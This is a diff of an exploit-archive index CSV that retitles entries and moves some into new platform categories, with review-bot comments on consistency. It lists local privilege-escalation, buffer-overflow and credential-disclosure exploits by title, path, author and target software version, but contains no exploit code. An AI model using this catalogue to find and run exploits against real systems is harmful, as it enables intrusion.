16677,platforms/windows/local/16677.rb,"CA AntiVirus Engine - CAB Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
|
||||
16678,platforms/windows/local/16678.rb,"VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,local,0
|
||||
16678,platforms/win_x86/local/16678.rb,"VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,local,0
|
||||
16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,local,0
|
||||
16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
|
||||
16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
|
||||
|
@ -6870,7 +6870,7 @@ id,file,description,date,author,platform,type,port
|
|||
17892,platforms/windows/local/17892.pl,"Muse Music All-in-One 1.5.0.001 - '.pls' Buffer Overflow (DEP Bypass)",2011-09-26,"C4SS!0 G0M3S",windows,local,0
|
||||
17893,platforms/windows/local/17893.pl,"GTA SA-MP server.cfg - Local Buffer Overflow",2011-09-26,Silent_Dream,windows,local,0
|
||||
17902,platforms/windows/local/17902.c,"Norman Security Suite 8 - 'nprosec.sys' Privilege Escalation",2011-09-28,Xst3nZ,windows,local,0
|
||||
17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 < 0.101 - Linux Privilege Escalation",2011-10-05,zx2c4,linux,local,0
|
||||
17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 < 0.101 - Privilege Escalation",2011-10-05,zx2c4,linux,local,0
|
||||
17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass",2011-10-07,modpr0be,windows,local,0
|
||||
17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,linux,local,0
|
||||
17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File id Parameter Overflow (Metasploit)",2011-10-10,Metasploit,windows,local,0
|
||||
|
@ -7277,8 +7277,8 @@ id,file,description,date,author,platform,type,port
|
|||
19992,platforms/linux/local/19992.c,"BSD mailx 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0
|
||||
19993,platforms/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",windows,local,0
|
||||
19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 - BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local,0
|
||||
20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail) (1)",2000-06-07,"Florian Heinz",linux,local,0
|
||||
20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail 8.10.1) (2)",2000-06-07,"Wojciech Purczynski",linux,local,0
|
||||
20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1)",2000-06-07,"Florian Heinz",linux,local,0
|
||||
20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2)",2000-06-07,"Wojciech Purczynski",linux,local,0
|
||||
20002,platforms/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 - SNMPD File Permission Vulnerabilities",2000-06-07,loveyou,hp-ux,local,0
|
||||
20003,platforms/solaris/local/20003.txt,"Intel Corporation Shiva Access Manager 5.0 - Solaris World Readable LDAP Password",2000-06-06,"Blaise St. Laurent",solaris,local,0
|
||||
20004,platforms/linux/local/20004.c,"Stelian Pop dump 0.4 - restore Buffer Overflow",2000-06-07,"Stan Bubrouski",linux,local,0
|
||||
|
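Review bot: the new title for 20000 ends in "Privilege Escalation(1)" with no space before the sequence number, while its sibling 20001 in the same hunk ends in "Privilege Escalation (2)". Add the space so both rows of the pair follow the same pattern and a search for "Escalation (" matches both.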
@ -7581,8 +7581,8 @@ id,file,description,date,author,platform,type,port
|
|||
21500,platforms/linux/local/21500.txt,"QNX RTOS 4.25 - monitor Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local,0
|
||||
21501,platforms/linux/local/21501.txt,"QNX RTOS 4.25 - dumper Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local,0
|
||||
21502,platforms/linux/local/21502.txt,"QNX RTOS 4.25/6.1 - su Password Hash Disclosure",2002-06-03,badc0ded,linux,local,0
|
||||
21503,platforms/linux/local/21503.sh,"QNX RTOS 4.25/6.1 - phgrafxPrivilege Escalation",2002-06-03,badc0ded,linux,local,0
|
||||
21504,platforms/linux/local/21504.sh,"QNX RTOS 4.25/6.1 - phgrafx-startup Privilege Escalation",2002-06-03,badc0ded,linux,local,0
|
||||
21503,platforms/linux/local/21503.sh,"QNX RTOS 4.25/6.1 - 'phgrafx' Privilege Escalation",2002-06-03,badc0ded,linux,local,0
|
||||
21504,platforms/linux/local/21504.sh,"QNX RTOS 4.25/6.1 - 'phgrafx-startup' Privilege Escalation",2002-06-03,badc0ded,linux,local,0
|
||||
21505,platforms/linux/local/21505.c,"QNX RTOS 6.1 - phlocale Environment Variable Buffer Overflow",2002-06-03,badc0ded,linux,local,0
|
||||
21506,platforms/linux/local/21506.c,"QNX RTOS 6.1 - PKG-Installer Buffer Overflow",2002-06-03,badc0ded,linux,local,0
|
||||
21507,platforms/linux/local/21507.sh,"QNX 6.x - 'ptrace()' Arbitrary Process Modification",2002-06-03,badc0ded,linux,local,0
|
||||
|
@ -7595,7 +7595,7 @@ id,file,description,date,author,platform,type,port
|
|||
21565,platforms/unix/local/21565.pl,"Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (1)",2002-06-15,stripey,unix,local,0
|
||||
21566,platforms/unix/local/21566.c,"Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (2)",2002-06-18,bob,unix,local,0
|
||||
21568,platforms/linux/local/21568.c,"Cisco VPN Client for Unix 3.5.1 - Local Buffer Overflow",2002-06-19,methodic,linux,local,0
|
||||
40348,platforms/windows/local/40348.py,"Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0
|
||||
40348,platforms/win_x86-64/local/40348.py,"Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",win_x86-64,local,0
|
||||
21577,platforms/hp-ux/local/21577.c,"HP CIFS/9000 Server A.01.05/A.01.06 - Buffer Overflow",2002-11-06,watercloud,hp-ux,local,0
|
||||
21583,platforms/linux/local/21583.pl,"Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (1)",2002-06-29,clorox,linux,local,0
|
||||
21584,platforms/linux/local/21584.pl,"Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (2)",2002-06-29,"andrea lisci",linux,local,0
|
||||
|
@ -7610,7 +7610,7 @@ id,file,description,date,author,platform,type,port
|
|||
21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0
|
||||
40362,platforms/windows/local/40362.txt,"Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
|
||||
40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - 'ZapyaService.exe' Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0
|
||||
40429,platforms/windows/local/40429.cs,"Microsoft Windows 10 10586 (x32/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
|
||||
40429,platforms/windows/local/40429.cs,"Microsoft Windows 10 10586 (x86/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
|
||||
21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
|
||||
21683,platforms/linux/local/21683.c,"qmailadmin 1.0.x - Local Buffer Overflow",2002-08-06,"Thomas Cannon",linux,local,0
|
||||
21684,platforms/windows/local/21684.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,windows,local,0
|
||||
|
@ -7703,7 +7703,7 @@ id,file,description,date,author,platform,type,port
|
|||
22326,platforms/linux/local/22326.c,"File 3.x - Utility Local Memory Allocation",2003-03-06,CrZ,linux,local,0
|
||||
22329,platforms/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 - HTML Source Password Retrieval",2003-03-03,THR,windows,local,0
|
||||
22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow",2002-03-02,"Knud Erik Hojgaard",unix,local,0
|
||||
22340,platforms/linux/local/22340.txt,"MySQL 3.23.x - mysqld Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local,0
|
||||
22340,platforms/linux/local/22340.txt,"MySQL 3.23.x - 'mysqld' Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local,0
|
||||
22344,platforms/linux/local/22344.txt,"Man Program 1.5 - Unsafe Return Value Command Execution",2003-03-11,"Jack Lloyd",linux,local,0
|
||||
22354,platforms/windows/local/22354.c,"Microsoft Windows 2000 - Help Facility .CNT File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0
|
||||
22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0
|
||||
|
@ -7856,8 +7856,8 @@ id,file,description,date,author,platform,type,port
|
|||
23738,platforms/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,linux,local,0
|
||||
23739,platforms/windows/local/23739.txt,"Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Privilege Escalation",2004-02-22,"Ian Vitek",windows,local,0
|
||||
23740,platforms/linux/local/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,local,0
|
||||
23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - EAuth Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0
|
||||
23759,platforms/linux/local/23759.pl,"MTools 3.9.x - MFormat Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0
|
||||
23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - 'EAuth' Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0
|
||||
23759,platforms/linux/local/23759.pl,"MTools 3.9.x - 'MFormat' Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0
|
||||
23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - PLF Exploit DEP/ASLR Bypass (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0
|
||||
23838,platforms/aix/local/23838.pl,"GNU Make For IBM AIX 4.3.3 - CC Path Local Buffer Overflow",2003-05-30,watercloud,aix,local,0
|
||||
23840,platforms/aix/local/23840.pl,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (1)",2003-05-30,watercloud,aix,local,0
|
||||
|
@ -7901,7 +7901,7 @@ id,file,description,date,author,platform,type,port
|
|||
24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0
|
||||
24459,platforms/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0
|
||||
24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption",2013-02-15,"Julien Ahrens",windows,local,0
|
||||
24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,linux,local,0
|
||||
24555,platforms/lin_x86-64/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,lin_x86-64,local,0
|
||||
24570,platforms/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 - Path Environment Variable Local Command Execution",2004-09-03,"Julio Cesar Fort",linux,local,0
|
||||
24578,platforms/osx/local/24578.rb,"Tunnelblick - Setuid Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local,0
|
||||
24579,platforms/osx/local/24579.rb,"Viscosity - setuid-set ViscosityHelper Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local,0
|
||||
|
@ -7935,7 +7935,7 @@ id,file,description,date,author,platform,type,port
|
|||
25106,platforms/linux/local/25106.c,"Typespeed 0.4.1 - Local Format String",2005-02-16,"Ulf Harnhammar",linux,local,0
|
||||
25130,platforms/windows/local/25130.py,"FuzeZip 1.0.0.131625 - Buffer Overflow (SEH)",2013-05-01,RealPentesting,windows,local,0
|
||||
25131,platforms/windows/local/25131.py,"WinArchiver 3.2 - Buffer Overflow (SEH)",2013-05-01,RealPentesting,windows,local,0
|
||||
25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0
|
||||
25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - glibc FORTIFY_SOURCE Bypass + Privilege Escalation",2013-05-01,aeon,linux,local,0
|
||||
25141,platforms/windows/local/25141.rb,"AudioCoder 0.8.18 - Buffer Overflow (SEH)",2013-05-02,metacom,windows,local,0
|
||||
25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation (1)",2005-03-09,sd,linux,local,0
|
||||
25204,platforms/windows/local/25204.py,"ABBS Audio Media Player 3.1 - '.lst' Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0
|
||||
|
@ -7973,7 +7973,7 @@ id,file,description,date,author,platform,type,port
|
|||
25961,platforms/windows/local/25961.c,"SoftiaCom wMailServer 1.0 - Local Information Disclosure",2005-07-09,fRoGGz,windows,local,0
|
||||
25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 - Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",linux,local,0
|
||||
26100,platforms/linux/local/26100.sh,"Lantronix Secure Console Server SCS820/SCS1620 - Multiple Local Vulnerabilities",2005-08-05,c0ntex,linux,local,0
|
||||
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",linux,local,0
|
||||
26131,platforms/lin_x86-64/local/26131.c,"Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",lin_x86-64,local,0
|
||||
26185,platforms/osx/local/26185.txt,"Apple Mac OSX 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0
|
||||
26195,platforms/linux/local/26195.txt,"QNX RTOS 6.1/6.3 - InputTrap Local Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",linux,local,0
|
||||
26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access",2005-09-01,rotor,linux,local,0
|
||||
|
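Review bot: Row 26131 keeps its id, but both the file column (platforms/linux/local/26131.c to platforms/lin_x86-64/local/26131.c) and the platform column change. Anything that resolves entries by path or filters on platform=linux will stop finding this row. Confirm the file itself is moved in the same commit, and mention the new platform value in the commit message so that local copies keyed on path can be re-synced by id.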
@ -8149,14 +8149,14 @@ id,file,description,date,author,platform,type,port
|
|||
30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 - Responder Privilege Escalation",2007-11-20,"Andrew Christensen",linux,local,0
|
||||
30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0
|
||||
30789,platforms/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0
|
||||
30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 - daemon_start Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0
|
||||
30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0
|
||||
30999,platforms/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Privilege Escalation",2008-01-07,"Ruben Santamarta",windows,local,0
|
||||
31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0
|
||||
31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0
|
||||
31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Based Buffer Overflow",2008-02-12,forensec,linux,local,0
|
||||
31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0
|
||||
31346,platforms/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write Exploit (2)",2014-02-02,saelo,linux,local,0
|
||||
31347,platforms/linux/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,linux,local,0
|
||||
31347,platforms/lin_x86/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,lin_x86,local,0
|
||||
31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) ASLR + DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0
|
||||
31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Privilege Escalation",2014-02-06,LiquidWorm,windows,local,0
|
||||
31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0
|
||||
|
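Review bot: Row 31347 is refiled under platforms/lin_x86/ with platform lin_x86, but CONFIG_X86_X32 is the x32 ABI option of 64-bit x86 kernels, so lin_x86-64 looks like the correct bucket. The sibling row 31346, 'CONFIG_X86_X32' Arbitrary Write Exploit (2), is left under platforms/linux/ with platform linux. Move both rows together so that a platform filter returns the whole numbered series.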
@ -8173,7 +8173,7 @@ id,file,description,date,author,platform,type,port
|
|||
31937,platforms/php/local/31937.txt,"PHP 5.2.6 - chdir Function http URL Argument Safe_mode Restriction Bypass",2008-06-18,"Maksymilian Arciemowicz",php,local,0
|
||||
31940,platforms/osx/local/31940.txt,"Apple Mac OSX 10.x - Applescript ARDAgent Shell Privilege Escalation",2008-06-19,anonymous,osx,local,0
|
||||
31959,platforms/linux/local/31959.txt,"Perl - 'rmtree()' Function Local Insecure Permissions",2008-06-23,"Frans Pop",linux,local,0
|
||||
40349,platforms/windows/local/40349.py,"LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0
|
||||
40349,platforms/win_x86-64/local/40349.py,"LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",win_x86-64,local,0
|
||||
31972,platforms/windows/local/31972.py,"Gold MP4 Player 3.3 - Buffer Overflow (SEH)",2014-02-28,metacom,windows,local,0
|
||||
31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 - 'Settings.ini' Buffer Overflow (SEH) (Metasploit)",2014-02-28,Metasploit,windows,local,0
|
||||
31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - '.cue' Stack Buffer Overflow",2014-02-28,Provensec,windows,local,0
|
||||
|
@ -8199,7 +8199,7 @@ id,file,description,date,author,platform,type,port
|
|||
32693,platforms/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' Safe Mode Restriction-Bypass",2008-12-31,Mr.SaFa7,php,local,0
|
||||
32700,platforms/linux/local/32700.rb,"ibstat $PATH - Privilege Escalation (Metasploit)",2014-04-04,Metasploit,linux,local,0
|
||||
32737,platforms/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",windows,local,0
|
||||
32751,platforms/linux/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",linux,local,0
|
||||
32751,platforms/lin_x86-64/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",lin_x86-64,local,0
|
||||
32752,platforms/windows/local/32752.rb,"WinRAR - Filename Spoofing (Metasploit)",2014-04-08,Metasploit,windows,local,0
|
||||
32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Privilege Escalation",2009-02-02,"Ruben Santamarta",windows,local,0
|
||||
32778,platforms/windows/local/32778.pl,"Password Door 8.4 - Local Buffer Overflow",2009-02-05,b3hz4d,windows,local,0
|
||||
|
@ -8224,7 +8224,7 @@ id,file,description,date,author,platform,type,port
|
|||
33069,platforms/windows/local/33069.rb,"Wireshark 1.8.12/1.10.5 - wiretap/mpeg.c Stack Buffer Overflow (Metasploit)",2014-04-28,Metasploit,windows,local,0
|
||||
33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework - Default Location Insecure Temporary File Creation",2009-08-03,"Melissa Elliott",linux,local,0
|
||||
33161,platforms/php/local/33161.php,"PHP 5.3 - 'mail.log' Configuration Option 'open_basedir' Restriction Bypass",2009-08-10,"Maksymilian Arciemowicz",php,local,0
|
||||
33213,platforms/windows/local/33213.rb,"Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)",2014-05-06,Metasploit,windows,local,0
|
||||
33213,platforms/win_x86/local/33213.rb,"Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)",2014-05-06,Metasploit,win_x86,local,0
|
||||
33229,platforms/bsd/local/33229.c,"NetBSD 5.0.1 - 'IRET' General Protection Fault Handling Privilege Escalation",2009-09-16,"Tavis Ormandy",bsd,local,0
|
||||
33255,platforms/linux/local/33255.txt,"Xen 3.x - pygrub Local Authentication Bypass",2009-09-25,"Jan Lieskovsky",linux,local,0
|
||||
33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Privilege Escalation (1)",2009-11-03,"teach & xipe",linux,local,0
|
||||
|
@ -8236,20 +8236,20 @@ id,file,description,date,author,platform,type,port
|
|||
33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",linux,local,0
|
||||
40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1)",2016-11-24,IOactive,windows,local,0
|
||||
33508,platforms/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0
|
||||
33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
|
||||
33516,platforms/lin_x86-64/local/33516.c,"Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",lin_x86-64,local,0
|
||||
33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0
|
||||
33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0
|
||||
33589,platforms/linux/local/33589.c,"Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0
|
||||
33589,platforms/lin_x86-64/local/33589.c,"Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",lin_x86-64,local,0
|
||||
33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local,0
|
||||
33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' and '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local,0
|
||||
33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Privilege Escalation",2014-06-02,"Sebastian Krahmer",linux,local,0
|
||||
33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0
|
||||
33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0
|
||||
40342,platforms/windows/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",windows,local,0
|
||||
40342,platforms/win_x86-64/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",win_x86-64,local,0
|
||||
33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - addJavascriptInterface Exploit (Metasploit)",2014-06-17,Metasploit,arm,local,0
|
||||
33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0
|
||||
33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
|
||||
33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - Privilege Escalation PoC (SGID)",2014-06-21,"Vitaly Nikolenko",linux,local,0
|
||||
33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC)",2014-06-21,"Vitaly Nikolenko",linux,local,0
|
||||
33892,platforms/windows/local/33892.rb,"Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)",2014-06-27,Metasploit,windows,local,0
|
||||
33893,platforms/windows/local/33893.rb,"Microsoft Registry Symlink - IE Sandbox Escape (MS13-097) (Metasploit)",2014-06-27,Metasploit,windows,local,0
|
||||
33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Privilege Escalation",2014-06-28,"Thomas Stangner",linux,local,0
|
||||
|
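Review bot: Rows 33516, 33589 and 40342 receive the platform value lin_x86-64 or win_x86-64 while their titles keep the tag "x64". Pick one spelling for the title tag and the platform column, because a text search on either spelling alone now matches only one of the two fields for these rows.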
@ -8298,7 +8298,7 @@ id,file,description,date,author,platform,type,port
|
|||
35177,platforms/windows/local/35177.py,"i-FTP 2.20 - Buffer Overflow SEH Exploit",2014-11-06,metacom,windows,local,0
|
||||
35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0
|
||||
35216,platforms/windows/local/35216.py,"Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0
|
||||
35234,platforms/linux/local/35234.py,"OSSEC 2.8 - hosts.deny Privilege Escalation",2014-11-14,skynet-13,linux,local,0
|
||||
35234,platforms/linux/local/35234.py,"OSSEC 2.8 - 'hosts.deny' Privilege Escalation",2014-11-14,skynet-13,linux,local,0
|
||||
35235,platforms/windows/local/35235.rb,"Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)",2014-11-14,Metasploit,windows,local,0
|
||||
35236,platforms/windows/local/35236.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)",2014-11-14,Metasploit,windows,local,0
|
||||
35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
|
||||
|
@ -8389,7 +8389,7 @@ id,file,description,date,author,platform,type,port
|
|||
